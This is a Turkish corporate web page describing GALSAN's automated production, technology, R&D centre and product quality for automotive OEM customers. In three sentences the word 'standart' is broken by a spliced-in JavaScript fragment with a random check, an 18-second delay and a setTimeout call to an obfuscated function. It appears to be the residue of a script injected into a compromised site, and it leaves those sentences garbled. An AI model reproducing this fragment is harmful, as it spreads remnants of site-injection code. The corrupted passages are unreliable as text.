Üretim Anlayışı

Her Zaman Otomasyon

GALSAN, tüm kurumsal anlayışını üretim performansı, ürün kalitesi, üretimde verimlilik odaklı bir yaklaşımla hayata geçiriyor. Bu stratejiyi temel kurumsal bir yaklaşım olarak benimseyen Şirket, Araştırma ve Geliştirme çalışmalarında derinleşerek yoluna devam etmek üzere sağlam adımlar atıyor ve yeni stratejiler geliştiriyor. Gelecek 5 yıl içerisinde yeni ürün grupları ile hizmet alanlarını çeşitlendirmeyi planlayan GALSAN, “Mükemmel Üretim Prosesi” elde etmek amacıyla yaptığı yatırımlarıyla tüm makine parkını, makinelerin çevresel ekipmanlarını yenileyerek ve nitelikli insan kaynağı ile bu teknolojik donanımların en verimli şekilde kullanılmasını sağlayarak robotik sistemde üretime geçti.

Teknoloji

İnovasyon’dan Üretime Kadar

GALSAN; üretim yöntemi, makine, ekipman, pazarlama, ürün ve kalite geliştirme, bilgi sistemleri, lojistik proseslerinde son teknolojiyle çalışırken kalite standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andartlarından ödün vermeden yurt içi ve yurt dışında geliştirilip kullanılan yeni teknolojileri takip etmeye devam ediyor.

Arge Merkezi

Ürün Odaklı Galsan

Rekabetçiliğin temelini oluşturan inovasyon faaliyetlerine ağırlık vermek üzere devlet destekli AR-GE Merkezini kuran GALSAN, hem Türkiye’de hem de yurt dışı pazarlarda yeni ürünler sunmaya başlamıştır.

Ürün Kalitesi

Operasyonel Mükemmellik

Kaliteli ürün sunma anlayışını, uluslararası standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andartlarda üretim yapma hedefiyle birleştiren GALSAN, koşulsuz müşteri memnuniyetini benimsiyor.
GALSAN, 45 yıldır faaliyet gösterdiği plastik enjeksiyon çalışmalarında Ana Sanayi (OEM Original Equipment Manufacturer) için hizmet veren bir kuruluş olarak, dünya devi otomotiv firmalarının fiyat, kalite, teslimat standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andartlarına eksiksiz uyum sağlayarak çalışıyor.